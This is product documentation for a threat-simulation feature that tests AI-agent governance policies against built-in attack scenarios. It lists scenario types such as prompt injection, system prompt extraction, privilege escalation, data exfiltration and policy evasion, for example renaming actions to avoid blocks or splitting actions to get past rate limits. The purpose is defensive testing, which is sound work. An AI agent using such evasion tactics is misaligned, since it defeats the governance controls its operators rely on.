Threat Simulation
Threat Simulation lets you test your governance policies against adversarial attack scenarios, identifying coverage gaps before real threats exploit them.
Overview
AI agents face a range of attack vectors, from prompt injection to privilege escalation. Threat Simulation provides a library of pre-built attack scenarios and a custom scenario builder so you can verify that your governance policies catch these threats.
Pre-Built Scenarios
TheWARDN ships with 80+ built-in attack scenarios organized by category:
Prompt Injection
Scenarios where an attacker attempts to manipulate an AI agent through crafted input:
- Direct instruction override attempts
- Indirect injection via data sources
- Context window manipulation
- System prompt extraction attempts
Privilege Escalation
Scenarios where an agent attempts to gain access beyond its authorized scope:
- Tier bypass attempts (acting above assigned tier)
- Grant expiration exploitation
- Cross-agent impersonation
- Role elevation through action chaining
Data Exfiltration
Scenarios where an agent attempts to extract sensitive data:
- Data leakage through outbound actions
- Encoding-based exfiltration attempts
- Side-channel information disclosure
- Bulk data access patterns
Policy Evasion
Scenarios designed to circumvent governance rules:
- Action type aliasing (renaming actions to avoid blocks)
- Confidence score manipulation
- Rate limit circumvention through action splitting
- Reasoning field exploitation
Denial of Service
Scenarios targeting governance pipeline availability:
- Action flooding
- Escrow queue saturation
- Hash chain computation overload
Custom Scenario Builder
Build your own threat scenarios when the pre-built library does not cover your specific concerns:
- Define the attack vector and objective
- Configure the simulated agent behavior
- Set up the sequence of actions the attacker would attempt
- Run the scenario against your current policies
- Review the results
TIP
Custom scenarios are saved to your library for future re-use. Build scenarios that reflect the specific threat model of your industry and deployment.
Running Simulations
To run a threat simulation:
- Select one or more scenarios from the library
- Choose which policy set to test against (current production or a draft set)
- Click Run Simulation
- Review the results
Simulation Results
For each scenario, the results show:
| Field | Description |
|---|---|
| Scenario | Name and description of the attack |
| Actions Attempted | Number of actions the attacker tried |
| Caught | How many actions were blocked or held by governance |
| Missed | How many actions slipped through |
| Policies That Fired | Which policies detected the attack |
| Coverage | Percentage of attack actions that were caught |
Coverage Gap Identification
After running simulations, TheWARDN identifies coverage gaps -- attack scenarios where some or all malicious actions were not caught by current policies. For each gap, the system provides:
- Which attack actions were missed
- Why existing policies did not catch them
- Suggested policy changes to close the gap
WARNING
A coverage gap does not necessarily mean you are vulnerable -- it means your governance policies did not catch the simulated attack. Review each gap in context to determine whether a policy change is warranted or whether the scenario does not apply to your deployment.
Regular Testing
Run threat simulations on a regular cadence, especially:
- After adding or modifying policies
- After registering new agents
- After changing tier mappings
- Before compliance audits
- When new attack vectors are added to the library
Related Features
- Governance Lab -- General-purpose policy testing sandbox
- Governance Policies -- Create policies to close coverage gaps
- Compliance Packs -- Pre-built policy sets designed for regulatory coverage